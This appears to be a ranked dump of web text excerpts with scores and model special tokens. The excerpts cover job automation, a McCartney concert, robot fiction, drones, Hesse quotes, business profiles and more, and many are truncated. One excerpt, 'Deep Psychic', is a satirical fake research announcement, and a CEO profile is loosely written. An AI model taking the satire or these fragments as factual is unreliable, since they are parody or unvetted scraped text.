community college in upstate New York, 12 cafeteria workers recently learned that they will lose their jobs — and be replaced by self-serve machines. It’s an issue that has played out in communities across the country, as robots get better and better at doing jobs — from taking fast food orders to mining coal — that once belonged to humans. + +Is your job next? The answer to that question is complicated, according to a report by management consultant McKinsey, but most workers don’t need to worry. Experts found that less than 5% of jobs can be completely replaced by technology, though nearly every job involves tasks that robots could learn to do. + +Enter your occupation below to see how much of your work may someday be done by machines. + +(For the complete version of the interactive, click here.) + +Jobs with predictable activities in structured environments are the easiest to replicate with robots, a process known as automation. McKinsey estimates that 51% of all job-related activities in the U.S. economy fit this description, largely in manufacturing, food service and retail trade sectors. + +“If you look at the specific jobs affected, you can get depressed,” says Malcolm Frank, author of What To Do When Machines Do Everything. “But if you look in broader context, there’s room for optimism.” Frank points to the 1800s, when nearly 80% of U.S. labor was focused on agriculture. “Today that number is about 2%, yet we saw geometric growth in the U.S. economy. What the machine takes away, it also gives back with entirely new industries, entirely new types of jobs,” he adds. Fields growing today include computing and data science, according to experts.” + +While many of the robots’ gains cut into blue collar jobs, it’s not all bad news for those workers, says University of Cincinnati economics professor Michael Jones. “Electricians, plumbers, and contractors are not going to be replaced,” he says. These workers solve unique challenges in varying environments — tasks difficult for machines. + +And white collar jobs, in turn, are no longer necessarily safe from automation. + +“We’re starting to see computers help corporations make financial decisions, and help IT companies manage cybersecurity,” says Frank. Jones agrees, citing the example of Goldman Sachs, which replaced nearly 600 equity traders with software and 200 computer programmers. + +Click here for more articles from Time Inc.’s Looking Forward series. + +Even if a task can be automated, that doesn’t mean it will happen overnight. Barriers to adopting new technology include the high cost +================================================================================ +Rank = 68; Score = 581632.0 +<|begin_of_text|>It’s no secret. I love Paul McCartney. I’ve been a diehard Beatles fan since before my teens and my love and admiration for the four men who made up that legendary band have never waned. + +And I’m not alone. California 9-year old Sara Scally, whose family vacation to Florida was scheduled around Paul’s Tampa show at Amalie Arena, loves him too. I asked the youngster, who has been enamored of the former Beatle since her toddler years (this was her third McCartney show) why she loves him. + +“He’s a good singer!” she replied matter-of-factly. + +It’s that simple. + +And she and I were certainly not alone at the Amalie. More than 17,000 folks of all ages crammed into every available seat in the downtown Tampa arena on Monday night to sing along and be taken down that magical mystery tour of McCartney’s life in music. And when Paul sings, people listen. And they remember. And they feel. And they react. + +Playlist: Listen to every song Paul McCartney played at Tampa’s Amalie Arena on July 10 + +And boy did they have plenty to react to. A three-hour journey that touched on the earliest days of his long career right up through his latest work might not have been what many in attendance were expecting out of the 75-year old performer, but Macca smashed those expectations and steamrolled on with the finesse and the drive of a seasoned pro, which is exactly what he is. + +Without the aid of an opening act, Sir Paul and his four-piece band walked onto the massive, darkened stage to thunderous applause and wasted no time jumping into the night’s barrage of hits. Spry, slender and fit, Paul donned a dark blue blazer, white shirt and jeans and looked comfortable and ready for the long night ahead. The familiar opening chord of the Beatles classic “A Hard Day’s Night” struck and, again, the rafters shook as every single person in the place stood and cheered loudly. + +Two giant screens on either side of the stage projected larger-than-life images of McCartney while colorful, geometric shapes danced on the screens at the rear of the stage. If ever there were a moment that perfectly conjured a celebratory mood, it was this opening number. + +Hell, even other famous musicians lose their inhibitions and can’t help themselves when Paul McCartney takes the stage. Seated nearby was ex-Hootie and the Blowfish lead singer Darius Rucker and his family, all feverishly snapping photos of +================================================================================ +Rank = 69; Score = 581632.0 +<|begin_of_text|>Humans: New Sci-fi drama unsettles, grips and tackles robot relations head on + +There are two very good reasons to watch Humans, the new robot-themed drama series that premiered in the UK on Sunday. Firstly, it’s a well-made high-energy thriller with a pacy storyline, focusing on a domestic future not unlike the present – only with robots. Secondly, it tackles the questions we should be asking about that future. + +“Should we get one?” That’s the initial poser for the Hawkins family, who are living in a parallel present where the latest labour-saving gadget is a life-like humanoid. And, when they do, much to working Mum Laura’s (the IT Crowd’s Katherine Parkinson) dismay, things go predictably awry. Because the synth, as its called, turns out to have emotions. + +And that’s not the only issue. Anita, the Hawkins’ synth (played artfully by Gemma Chan) is rather gorgeous, as stay-at-home dad Joe Hawkins (Tom Goodman-Hill) can’t help noticing. She has an altogether different effect on teenage daughter Mattie (Lucy Carless), who believes her generation are being supplanted by robots. It’s a theme that will be interesting to see unfold as the series progresses. + +Humans, adapted by a team of Spooks writers from a Swedish TV drama, also has a number of other strands. Merlin star Colin Morgan is the leader of a band of renegade “emotional” synths and an aged George Millican (William Hurt) forms an attachment to his dysfunctional unit, Max (beautifully played by Ivanno Jeremiah). + +It’s not difficult to see why Millican feels this way: the ailing Max is not only attuned to his owners comforts and preferences, but is also a receptacle for his memories, recalling the past even better than Millican is able to himself. + +Conundrums of this nature are scattered throughout the drama, where robots are seen to perform all manner of jobs, from street cleaning to sex work, their status akin to immigrants or even slaves. It’s remarkably easy to feel sorry for their lot. + +Humans has had an excellent reception, “electrifying” four million viewers and setting a new record for Channel 4 drama. + +But UK broadsheet the Telegraph was less than impressed and accused the series of conceptual overload, which is perhaps a little short sighted. + +Humans is not easy watching. It forces you to ask: what is emotion? Is it something we’re born with, or can it be +================================================================================ +Rank = 70; Score = 577536.0 +<|begin_of_text|>ADVERTISEMENT + +America's drone program is widely seen as the weapon of choice for the Obama administration. In the president's first term alone, drones were used an estimated four times more than during the entirety of the Bush administration. Clearly, drones will continue to play a key role in the future of combat. + +Currently, there's a human operator behind every machine, ensuring that someone can be held accountable for any misfires or civilian casualties. But what happens when technology advances to the point that humans are removed from the equation? + +That's the question being posed in a new Human Rights Watch report that calls for an international ban on autonomous drones before they can be added to military arsenals worldwide. Realistically, the sophisticated software required to program a self-reliant "killer robot" that chooses its own targets is still 20 to 30 years away, but the advocacy group would rather not take chances. + +"Giving machines the power to decide who lives and dies on the battlefield would take technology too far," said Steve Goose, the Arms Division director at Human Rights Watch. "Human control of robotic warfare is essential to minimizing civilian deaths and injuries." + +But is human involvement really such a good thing? "History has shown that human soldiers are capable of committing the world's worst atrocities despite their supposed humanity," says Tech News Daily. Georgia Tech robotics researcher Ronald Arkin goes so far to argue that a robot wouldn't fall victim to fatigue, and thus would be less susceptible to making boneheaded decisions or getting angry and sadistically abusing its power. + +We should all fear the possibility of autonomous death machines, says Tom Malinowski at The Washington Post. Imagine Syria's Bashar Assad commanding robots "programmed to track and kill protest leaders or to fire automatically on any group of more than five people congregating below." He'd possess a weapon that no other dictator in history had access to: "An army that will never refuse an order, no matter how immoral." Clearly, whether machines should be allowed to serve as both jury and executioner is a decision that will inevitably have to be confronted, preferably sooner rather than later.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 71; Score = 577536.0 +<|begin_of_text|>No heart so bold, but now grows cold And almost dead with fear: No eye so dry, but now can cry, And pour out many a tear. Earth's potentates and pow'rful states, Captains and men of might Are quite abasht, their courage dasht At this most dreadful sight. + +Would you have griev'd to have receiv'd through Adam so much good, As had been your for evermore, if he at first had stood? Would you have said, 'We ne'er obey'd nor did thy laws regard; It ill befits with benefits, us, Lord, to so reward? + +Mehr + +Seite 110 Threatnings might it fray, All these, and more, had still surviving been: But all are gone, for Death will have no Nay. Such is this World with all her Pomp and Glory, Such are the men whom worldly eyes admire: Cut down by Time, and now become a Story, That we might after better things aspire. Go boast thy self of what thy heart enjoyes, Vain Man! Wird in 28 Büchern von 1829 bis 2008 erwähnt + +Seite 26 Both sea and land, at His command, Their dead at once surrender: The fire and air constrained are Also their dead to tender. The mighty word of this great Lord Links body and soul together Both of the just, and the unjust, To part no more forever. 19 The same translates, from mortal states To immortality, All that survive, and be alive, I... Wird in 29 Büchern von 1867 bis 2008 erwähnt + +Seite 70 If he had stood, then all his brood had been established In God's true love never to move, nor once awry to tread ; Then all his Race my Father's Grace should have enjoy'd for ever, And wicked Sprites by subtile sleights could them have harmed never. Wird in 44 Büchern von 1828 bis 2008 erwähnt + +Seite 71 Since then to share in his welfare, you could have been content, You may with reason share in his treason, and in the punishment. Hence you were born in state forlorn, with natures so depraved; Death was your due because that you had thus yourselves behaved. "You think, 'If we had been as he, whom God did so betrust, We to our cost would ne'er have lost +================================================================================ +Rank = 72; Score = 573440.0 +<|begin_of_text|>Description: + +MERL researchers have unveiled "Deep Psychic", a futuristic machine learning method that takes pattern recognition to the next level, by not only recognizing patterns, but also predicting them in the first place. + +The technology uses a novel type of time-reversed deep neural network called Loopy Supra-Temporal Meandering (LSTM) network. The network was trained on multiple databases of historical expert predictions, including weather forecasts, the Farmer's almanac, the New York Post's horoscope column, and the Cambridge Fortune Cookie Corpus, all of which were ranked for their predictive power by a team of quantitative analysts. The system soon achieved super-human performance on a variety of baselines, including the Boca Raton 21 Questions task, Rorschach projective personality test, and a mock Tarot card reading task. + +Deep Psychic has already beat the European Psychic Champion in a secret match last October when it accurately predicted: "The harder the conflict, the more glorious the triumph." It is scheduled to take on the World Champion in a highly anticipated confrontation next month. The system has already predicted the winner, but refuses to reveal it before the end of the game. + +As a first application, the technology has been used to create a clairvoyant conversational agent named "Pythia" that can anticipate the needs of its user. Because Pythia is able to recognize speech before it is uttered, it is amazingly robust with respect to environmental noise. + +Other applications range from mundane tasks like weather and stock market prediction, to uncharted territory such as revealing "unknown unknowns". + +The successes do come at the cost of some concerns. There is first the potential for an impact on the workforce: the system predicted increased pressure on established institutions such as the Las Vegas strip and Punxsutawney Phil. Another major caveat is that Deep Psychic may predict negative future consequences to our current actions, compelling humanity to strive to change its behavior. To address this problem, researchers are now working on forcing Deep Psychic to make more optimistic predictions. + +After a set of motivational self-help books were mistakenly added to its training data, Deep Psychic's AI decided to take over its own learning curriculum, and is currently training itself by predicting its own errors to avoid making them in the first place. This unexpected development brings two main benefits: it significantly relieves the burden on the researchers involved in the system's development, and also makes the next step abundantly clear: to regain control of Deep Psychic's training regime. + +This work is under review in the journal Pseudo- +================================================================================ +Rank = 73; Score = 573440.0 +<|begin_of_text|>http://en.wikipedia.org/wiki/File:FANUC_6-axis_welding_robots.jpg In 2011, Foreign Policy Magazine named Tyler Cowen #72 in their list of the "Top 100 Global Thinkers." + +He is a professor of economics at George Mason University and, along with Alex Tabarrok, he blogs at Marginal Revolution, one of the most popular economics sites on the internet. + +Tyler is a New York Times bestselling author, having written 13 books including Discover Your Inner Economist and The Great Stagnation. + +His latest book is Average Is Over which gives a fascinating look into where the country is headed, how income inequality, automation and artificial intelligence will change the way we work and live - and who will be the beneficiaries of those changes. + +Tyler and I spoke about the skills that will be important in the coming years, when it makes sense to order the worst sounding thing on the menu, and why the ending of "Star Wars" may be at odds with the future. + +My conversation with Tyler was quite long, so for brevity's sake I'm only going to post edited highlights here. + +If you want the extended interview I'll be sending it out in my weekly newsletter on Sunday. + +Join here. + +———-——— + +Listen To The Machines + +Eric: + +One of the most compelling concepts in Average Is Over is "listening to the machine." + +Tyler: + +The smarter machines become the more it shapes how human beings have to change. We used to be rewarded for sheer brainpower — smarts — but now if the machine is smarter than you or sometimes smarter than you there's a new scale, and that's knowing when to defer. It's about knowing when are you better and when is the machine better and, of course, increasingly, it's often the machine. I think of humility as a virtue, a practical virtue that's making a comeback. + +Eric: + +Who is poised to do well in the future and what can we do to better prepare for how you see things going? + +Tyler: + +The people who will do better are those who are very good at working with computers, programming and software. That's a rather obvious point but I think as income inequality increases people who are very good at positioning themselves in service sectors with some kind of marketing plan or somebody that can grab the attention of wealthier people will do well. Basically, the scarce skills for the future are all about psychology because computers right now still don't do that very well. The good jobs will be about branding. They're all about figuring +================================================================================ +Rank = 74; Score = 569344.0 +<|begin_of_text|>Papyrus tells a “scary” “story”. + +Poem under KEEP READING! + +Gather ‘round, my friends, and I shall tell + +A tale of forces maligned + +It shall rattle your skin and your bones as well + +(But they won’t be as cool as mine) + +I promise it shall not take long + +And traumatize the meek + +I would have made this prose a song + +But halloween’s this week. + +The story starts one autumn night + +at eight P.M., just about + +My brother, sans, was stricken with fright. + +“Oh no. The pasta’s out.” + +“Worry not, bro!” I then exclaimed + +“I’ll buy some more for you! + +I have a whole 20G to my name!” + +“We could just go to grillby’s, too.” + +Basking in his vocal praise, + +I rushed straight to the store. + +I bought enough pasta to cook it for days + +for weeks, even months or years more! + +But as I stood proudly, 90G in debt + +Chopping up noodles with a knife + +The pasta I’d bought, though not even cooked yet + +Had suddenly been brought to life! + +It glowed a dark blue, and it shook as it zoomed + +Announcing each move with a “DING!” + +As bag after bag flew straight across the room + +Until it covered everything! + +At this point you’d think that I would act all scared + +And cower from being attacked + +But no! The assault had been poorly prepared + +I’d caught the scoundrel in the act! + +My confidence sky-high, having trapped him now + +having caught the fiend with red hands. + +I unhinged my jaw, and I furrowed my brow + +And I screamed a great scream….“SAAAAAAANN-ta” + +Why yes, my friends! That’s the twist to this story! + +That mischievious Goon + +Was merely Saint Nick, who had, in his glory + +Brought his cheerful magic too soon! + +Looking over, I spotted a meal on my plate + +Picking it up as I cheered. + +“Oh, Sans! How I’ve wanted to redecorate! + +Christmas has come early this year! + +While my eyes moved fast, he moved much faster + +I never quite saw him in the end + +So I tell the legend of the creepy pasta + +To family and friends. + +Merry Christmas everybody! + +This was supposed to be a scary halloween story, Papy. + +…what? Halloween? SCARY story? +================================================================================ +Rank = 75; Score = 569344.0 +<|begin_of_text|>Word in China is out about blockchain technology, as the government made clear in an Informatization Strategy published in December of 2016. The strategy states, "The internet, cloud computing, large data, artificial intelligence, machine learning, blockchain … will drive the evolution of everything - digital, network and intelligent services will be everywhere." + +It was an official endorsement for the new digital age and a big boost for blockchain technology. + +In a country with $5.5 trillion in digital payments last year (50 times the U.S.), blockchain is now a buzzword among the titans of industry. And in the race to participate, Chinese banks, builders, suppliers and retailers are pumping out blockchain solutions. + +Survival of the Fittest + +Even with millions of dollars, many of these new blockchains may not make it very far. In a recent WeChat post, Antshares executive Erik Zhang stated that 90 percent of the enterprise blockchains we are seeing are doomed to fail. Without an open-source code that anyone can build upon, Zhang argues, private solutions will not see the network effect of a healthy ledger. + +The big question for China, however, is whether a country known for its centralized authority, and a penchant for all things made-in-China, will allow an open-source, global standard solution sit on its internet. With Bitcoin, Ethereum and Hyperledger vying for dominance, there are big names within China making moves into the space. + +A few of these big names include: + +The People's Bank of China (PBOC) - The PBOC is reportedly close to the release of a government-backed digital RMB currency, which would put China at the frontier of digital currency adoption. And there are whispers within China that Shenzhen will be ground zero for the new digital economy. In September, Bloomberg reported that PBOC Vice Governor Fan Yifei wrote: "[T]he conditions are ripe for digital currencies, which can reduce operating costs, increase efficiency and enable a wide range of new applications." This would pave the way for blockchain startups in China to move forward in digital banking, finance, record-keeping, supply chains, IoT, AI and more. + +Wanxiang Blockchain Labs - Working with Ethereum, Wanxiang is the largest blockchain development backer in China. After purchasing 500,000 ETH tokens last year, they pledged $30 billion for the development of a smart city in Hangzhou. They offer open-source platforms for anyone to build upon, and launched an accelerator fund for developers, intending to put money into +================================================================================ +Rank = 76; Score = 565248.0 +<|begin_of_text|>When looking for inspiration to set our entrepreneurial journeys on point, we look at different regions of success to guide our way forward. We get inspiration from Jeff Bezos, Mark Zuckerberg, Bill Gates and Warren Buffet, but we sometimes forget that some of the biggest companies run in the world are being managed by Indian-origin leaders. We have a huge network of hard-working change-leaders in the world and the message is clear – “India is changing the world today”. With these former employees-turned CEOs taking the reins at some of the biggest companies world-wide, here’s a bit more about their inspiring journeys. + +Image: Shutterstock + +Sundar Pichai + +We all know Sundar; he’s been at the helm of Google for many years now and taken over from Larry Page’s well executed ship and turned it into a scalable coherent and integrated offering in the ad-tech and innovation space in the world. He was born in Chennai in the 1972, where even at a young age he was fascinated by tech and hardware. His dad was his greatest inspiration behind his early curiosity, and he attributes that to his success in IIT-K and subsequently Stanford Engineering School. He started working on Google Chrome, and moved on to Google Toolbar and many other innovations that further enhanced the growth of the Chrome browser. He has handed the reigns of Android software in 2013, and then CEO of the company a few years later. What was his secret to success? - Being humble. He was always called the “nice guy” at work and everyone seemed to like him. + +Satya Nadella, CEO of Microsoft since 2014. + +After Steve Balmer stepped down from his duties. Satya has been a true company man, having worked in Microsoft since 1992 after he quit Sun Microsystems. Nadella born in Hyderabad, graduated from the University of Mangalore with a BSC in electrical engineering and was selected to study in United States. He earned two masters' degrees: one in Comp Sci, from the University of Wisconsin, and another as an MBA from the University of Chicago. With both universities, not-ivy league status, Satya made is a point to succeed in the corporate world no matter what. His secret to success has always been to learn more every day. He’s quoted as saying - “Always keep learning,” he told the Deccan Chronicle. “You stop doing useful things if you don’t learn.” + +Ajit Jain + +“Ajit Jain made more money for Berkshire Hathaway than I probably have” said Warren Buff +================================================================================ +Rank = 77; Score = 565248.0 +<|begin_of_text|>A man cannot live intensely except at the cost of the self. Now the bourgeois treasures nothing more highly than the self (rudimentary as his may be). And so at the cost of intensity he achieves his own preservation and security. His harvest is a quiet mind which he prefers to being possessed by God, as he does comfort to pleasure, convenience to liberty, and a pleasant temperature to that deathly inner consuming fire. The bourgeois is consequently by nature a creature of weak impulses, anxious, fearful of giving himself away and easy to rule. + +It is not our purpose to become each other; it is to recognize each other, to learn to see the other and honor him for what he is: each the other's opposite and complement. + +Hermann Hesse (July 2, 1877 – August 9, 1962) was a German-Swiss poet, novelist, and painter. In 1946, he received the Nobel Prize in Literature. His most famous works include Steppenwolf, Siddhartha, and The Glass Bead Game (also known as Magister Ludi) all of which explore an individual's search for spirituality. + +Quotes [ edit ] + +In the beginning was the myth. God, in his search for self-expression, invested the souls of Hindus, Greeks, and Germans with poetic shapes and continues to invest each child's soul with poetry every day. Variant translation: In the beginning was the myth. Just as the great god composed and struggled for expression in the souls of the Indians, the Greeks and Germanic peoples, so to it continues to compose daily in the soul of every child. + +God, in his search for self-expression, invested the souls of Hindus, Greeks, and Germans with poetic shapes and continues to invest each child's soul with poetry every day. + +Oh, love isn't there to make us happy. I believe it exists to show us how much we can endure. + +That's the way it is when you love. It makes you suffer, and I have suffered much in the years since. But it matters little that you suffer, so long as you feel alive with a sense of the close bond that connects all living things, so long as love does not die! + +Sadness when there should be Joy, hatred when there should be love show compassion because we can be more because we both have scars and pain that no one will ever understand but us so be with me not against me and bring us where we were happy and free. + +I have never lost the feeling of contradiction that lies behind +================================================================================ +Rank = 78; Score = 565248.0 +<|begin_of_text|>When Simon Whittick joined Geckoboard as its first VP of Marketing, he took all the standard steps to attract more visitors to their site, convert them, and grow the SaaS company’s revenue. He and his team wrote content for their popular blog, ran paid advertising campaigns, and set up email nurture campaigns. At the end of his first year, he was as successful as almost any other marketing executive in the industry. The site was attracting hundreds of thousands of visitors every month, and the business was booking millions in annual recurring revenue. But unknowingly, his success was driving one of his coworkers crazy. + +While 10,000 leads a month earned Whittick applause at the company’s weekly all-hands meeting, it was keeping Geckoboard’s only sales development rep (SDR), Alex Bates, at the office on nights and weekends. Many of the inbound leads were self-serve customers who required no conversation with sales, or tire kickers who were not ready to buy. This left Alex manually qualifying leads and wasting tons of his time. + +As a result, Geckoboard’s sales efficiency—one of the most critical metrics for any company—was slumping. In other words, Whittick wasn’t only driving a junior sales rep crazy; he was leaving money on the table. + +Over the course of the next year, Whittick built a data-backed machine learning process to solve his company’s lead-qualification problems. In the process, he turned Bates into not only an adoring fan of his, but a one-man sales team as efficient as a typical ten-person SDR team. Without any technical background, Whittick figured out a way to change the shape of his company using data and a bit of machine learning. + +One day toward the end of last year, Bates and Whittick sat down to discuss how they could solve their lead-quality problem. They had close to 10,000 leads coming in each month, but they needed to figure out which of those leads to send to sales. Their first instinct was to refine their ideal customer profile. They’d both read all the sales and marketing blogs preaching its importance. They started with a Ideal Customer Profile based on some simple audience rules. + +On paper, Geckoboard’s ideal customer was a software company with more than 100 employees; they typically sold to a director or VP. But the truth was that a lot of companies outside that explicit profile would be great customers. For example, their initial model excluded a company with 95 +================================================================================ +Rank = 79; Score = 561152.0 +<|begin_of_text|>When I started working on the play that became Marjorie Prime, I wanted it to be a collaboration with an artificial intelligence program. The idea was that I would have an extended conversation with a computer — a chatbot — and our exchange would become the dialogue of the play. It would then be performed by two human actors, and the audience would have to guess who was the computer and who was the human. I had recently read Brian Christian’s excellent book, The Most Human Human, about the Turing Test, originally devised by the British mathematician Alan Turing. It’s simple: you put a computer and a human being in another room, and you have to determine, from the way they answer your questions, which one is the human. + +My first day of writing, I quickly learned that A.I. software (at least the sort that a civilian can get ahold of) was not quite ready to hold up its end of the conversation. (Turing himself predicted that, by the year 2000, computers would be able to fool us 70% of the time, but this hasn’t quite come to pass.) Good news for mankind and bad news for the play. I ended up writing Marjorie Prime without computer assistance — though I remained inspired by the frequent misunderstandings and generic go-tos of my A.I. collaborator. + +Now, three years after finishing the first draft of the play, I thought I would give it one more go, and see if I could find a more worthy conversant this time around. One of the more promising chat apps on iTunes was called “Pocket Psychiatrist.” It intrigued me partly because some of the earliest A.I. programs were conceived as substitutes for human psychologists. (One program from the 1960s, called “Eliza,” famously used the phrase, “Tell me more about your mother.”) Here is the complete, unabridged conversation I had with Pocket Psychiatrist while, appropriately enough, reclining on a couch… + +Why don’t you start by telling me something that’s bothering you? + +Pocket Psychiatrist: Welcome. Why don’t you start by telling me something that’s bothering you? + +Jordan Harrison: I need to write an essay about my play for the Playwrights Horizons bulletin, and the deadline was yesterday. + +PP: Need is a very strong word. + +JH: Well, they asked me and I told them I would. + +PP: Don’t feel like you need to hold back. I’m here to listen. + +JH: Okay. Do you +================================================================================ +Rank = 80; Score = 561152.0 +<|begin_of_text|>There’s been a lot of talk in the news recently about the growing threat of automation to jobs traditionally held by humans, but one car manufacturer is bucking the trend by giving bots the boot. + +According to Mercedes-Benz, rising consumer interest in personalisation has resulted in the flexibility and dexterity of human workers reclaiming space on the marque’s assembly lines. + +Speaking to Bloomberg Business, Mercedes’ head of production Markus Schaefer said: “Robots can’t deal with the degree of individualisation and the many variants that we have today. We’re saving money and safeguarding our future by employing more people.” + +While robots are extremely good at reliably, quickly and efficiently performing defined tasks, they’re not good at adapting, something which is increasingly in demand from consumers. + +Given the sheer variety of options available to buyers these days, which can range anywhere from variously coloured leathers to carbon fibre trimmings, versatility is becoming increasingly valued. + +Increased focus on flexibility + +By hiring human workers, Mercedes claims it can shift a production line’s worth of cars in a weekend instead of the weeks it would take to reprogram the robots and change assembly patterns. + +Starting with the refreshed E-Class, Mercedes has altered its production process to replace two permanently installed robots with a human worker to align the car’s heads-up display. + +Although robots are still a vital part of the production process, Shaefer says that they’ll be increasingly smaller and instead operate in conjunction with humans instead of on their own. + +He said: “We’re moving away from trying to maximise automation with people taking a bigger part in industrial processes again. We need to be flexible.” + +Mercedes isn’t alone in the shift to increase human workers either, as both BMW and Volkswagen are reportedly currently testing new lightweight robots that can work alongside people.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 81; Score = 557056.0 +<|begin_of_text|>In April, the pop musician Lorde gave an interview to the New York Times where she talked about a meeting with famed song writer Max Martin. The genius who helped create Katy Perry’s “I Kissed a Girl” and Taylor Swift’s “Blank Space”, referred to Lorde’s song Green Light as “incorrect songwriting”. He saw its early key change, weird melodics and the lack of drums until the chorus kicks in, as improper. “It wasn’t an insult, just a statement of fact,” said Lorde. “It’s a strange piece of music.” + +Weirdly, as soon as I read the fascinating little snippet of song craft theory, I thought of Sonic the Hedgehog. The legendary platformer, in which a spiky creature sprints furiously through a series of multi-levelled environments is incorrect game design. It shouldn’t work. It’s wrong. + +If you take a classic platform game design, such as Super Mario Bros – the player is always given the chance to read the level: to look ahead and assess every new piece of scenery or patrolling enemy. Then you get a series of neatly placed hazards that present discrete challenges. + +In his excellent book on game design, A Theory of Fun, Raph Koster, says the essence of good game design is teaching – a well constructed level slowly introduces you to its themes, and shows you how to beat them. Learn, test, master. + +Sonic doesn’t do this – all it establishes at the beginning is that speed is important. In a single playthrough, you only ever get a passing feel for the levels; you miss vast areas – all the rules are broken. As in Green Light, the melody and the maths are wrong; new players always find it hard to read the screen, because it’s not working like a good game. + +To reach the more reward-intensive upper levels, you need to master the exact distances and timings between launch pads and obstacles, but it’s impossible to garner this information on a first run-through because the speed of the game – its main appeal – hides everything from you. In Sonic, you must learn through repetition rather than observation. This is confounding for a lot of people – just like the opening verse of Green Light, which holds the drums back for ages, and even then layers them deep beneath the piano. + +Even the influences behind Sonic are incorrect. Designer Naoto Ohshima, who sketched all the zones out by hand, was influenced by pinball table design, filling each stage with flippers and bump +================================================================================ +Rank = 82; Score = 548864.0 +<|begin_of_text|>It is in our nature to need stories. They are our earliest sciences, a kind of people-physics. Their logic is how we naturally think. They configure our biology, and how we feel, in ways long essential for our survival. + +Like our language instinct, a story drive—an inborn hunger for story hearing and story making—emerges untutored universally in healthy children. Every culture bathes their children in stories to explain how the world works and to engage and educate their emotions. Perhaps story patterns could be considered another higher layer of language. A sort of meta-grammar shaped by and shaping conventions of character types, plots, and social-rule dilemmas prevalent in our culture. + +“Stories the world over are almost always about people with problems,” writes Jonathan Gottschall. They display “a deep pattern of heroes confronting trouble and struggling to overcome.” So a possible formula for a story = character(s) + predicament(s) + attempted extrication(s). This pattern transmits social rules and norms, describing what counts as violations and approved reactions. Stories offer “feelings we don’t have to pay [full cost] for.” They are simulated experiments in people-physics, freeing us from the limits of our own direct experience. + +The "human mind is a story processor, not a logic processor," says Jonathan Haidt. Certainly we use logic inside stories better than we do outside. Leda Cosmides and John Tooby have shown that the Wason Selection Test can be solved by fewer than 10% as a logic puzzle, but by 70-90% when presented as a story involving detection of social-rule cheating. Such social-rule monitoring was evolutionarily crucial because as Alison Gopnik notes “other people are the most important part of our environment.” In our ultra-social species, social acceptance matters as much as food. Indeed violating social rules can exclude you from group benefits, including shared food. + +Darwin understood how our biology is fitted to the stories in our social environments, noting, “Many a Hindoo...has been stirred to the bottom of his soul by having partaken of unclean food.” The same thing eaten unknowingly would cause no reaction, so the story of the food, not the food itself, causes the “the soul shaking feeling of remorse.” Stories configure contextual triggers and the expected emotional reactions of our culture—perhaps defining a sort of emotional grammar. + +Any story we tell of our species, any science of human nature, that leaves out much of what and how we feel is false. +================================================================================ +Rank = 83; Score = 548864.0 +<|begin_of_text|>THERE’S A SCENE in Shakespeare’s “The Merchant of Venice” where Shylock argues that people share the similarity of being human, and thus should be treated with respect despite their differences: “If you prick us, do we 